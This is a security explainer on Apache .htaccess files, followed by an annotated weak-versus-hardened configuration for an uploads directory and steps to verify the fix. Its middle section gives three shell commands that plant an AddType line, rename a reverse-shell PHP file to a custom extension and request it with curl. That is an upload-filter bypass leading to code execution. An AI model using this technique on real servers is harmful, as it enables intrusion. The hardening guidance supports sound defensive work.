.htaccess
The .htaccess file is a per-directory configuration file read by Apache web servers. It allows directives to be set for a directory without editing the global server configuration: when Apache serves a request from a directory that contains a .htaccess file, it parses the file and applies its directives to that directory and all of its subdirectories. Whether the file is read at all, and which classes of directive it may contain, is governed by the AllowOverride directive in the main configuration (AllowOverride None disables .htaccess processing entirely, while AllowOverride FileInfo permits handler and type mappings such as AddType, AddHandler and SetHandler). The file is commonly used for access restrictions, redirects, URL rewriting, custom error pages and other per-directory security rules.
The file operates hierarchically: directives in a .htaccess located deeper in the directory tree override those set higher up, which gives fine-grained control over individual application components. Because it directly changes how the web server handles requests, both the write permissions on the file and the set of directives it is allowed to contain are critical from a security standpoint. Misconfigurations can expose sensitive data, weaken authentication controls, or disclose server internals.
Attackers look for readable .htaccess files to learn about application logic and server behaviour (Apache's stock configuration denies client access to files matching .ht*, but that rule is sometimes removed or not carried over to new virtual hosts). When an application or a compromised account can write a .htaccess file, malicious directives can be inserted to enable backdoors, tamper with request handling, or interfere with logging. The file is therefore both a legitimate administrative tool and a common target in web exploitation.
For example, suppose an upload filter blacklists .php files and their variants (php5, phar, phtml, and so on) but does not block dotfiles such as .htaccess. An attacker can upload a .htaccess file into the /uploads directory that maps an arbitrary extension (e.g. x7331) to the PHP MIME type application/x-httpd-php; with mod_php, Apache then hands every file with that extension to the PHP engine. Two conditions must hold for this to work: the server's AllowOverride setting for the uploads directory must permit FileInfo directives (AddType is one), and PHP must run as mod_php. On PHP-FPM deployments, where PHP is wired up through SetHandler and a proxy handler rather than a MIME type, AddType alone has no effect, although a SetHandler line in the same .htaccess may still succeed if FileInfo overrides are allowed and the proxy module is loaded.
# Create the .htaccess file
$ echo "AddType application/x-httpd-php .x7331" > .htaccess
# Rename the malicious file
$ cp revshell_ivan.php revshell_ivan.x7331
# Execute the file as a PHP script
$ curl http://access/uploads/revshell_ivan.x7331
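The server-side counterpart, added here as an example and not part of the original page or of any particular project's configuration: an Apache virtual host fragment showing the permissive setting that makes the trick above work, followed by a hardened block for the same upload directory. The path /var/www/app/uploads, the module identifier php_module and the extension list are assumptions.

```apache
# --- Weak: the uploads directory honours any .htaccess an attacker can upload ---
<Directory "/var/www/app/uploads">
    # AllowOverride All lets .htaccess use FileInfo directives such as
    # AddType/AddHandler/SetHandler, so "AddType application/x-httpd-php .x7331"
    # takes effect and revshell_ivan.x7331 is executed by mod_php.
    AllowOverride All
    Require all granted
</Directory>

# --- Hardened: same directory, uploads are served as inert static content only ---
<Directory "/var/www/app/uploads">
    Require all granted

    # Ignore .htaccess entirely; Apache will not even open the file here.
    AllowOverride None

    # Force every file in this tree through the static-file handler,
    # whatever extension or MIME type it carries (defeats a server-level AddType).
    SetHandler default-handler

    # mod_php only: switch the PHP engine off for this directory.
    # php_admin_* settings cannot be overridden from .htaccess or ini_set().
    # (Assumption: module identifier is php_module as in PHP 8; PHP 7 uses php7_module.)
    <IfModule php_module>
        php_admin_flag engine off
    </IfModule>

    # Belt and braces: refuse to serve anything that looks like a PHP script,
    # even if a later configuration change re-attaches a handler (e.g. a global
    # <FilesMatch "\.php$"> SetHandler "proxy:..." block on PHP-FPM setups).
    <FilesMatch "\.(php[0-9]?|phar|phtml|phps|inc)$">
        Require all denied
    </FilesMatch>

    # No directory listings, no server-side includes, no CGI in the upload tree.
    Options -Indexes -Includes -ExecCGI
</Directory>

# Keep the stock rule that hides .htaccess/.htpasswd from clients; it is what
# stops an attacker from reading the file for reconnaissance.
<Files ".ht*">
    Require all denied
</Files>
```

After reloading the configuration, verify the effect rather than trusting it: drop a file such as probe.x7331 containing a PHP tag into the uploads directory alongside a .htaccess with the AddType line from the page, request it with curl, and confirm the server returns the raw file contents with a non-PHP Content-Type instead of executing it. Requesting .htaccess itself should return 403.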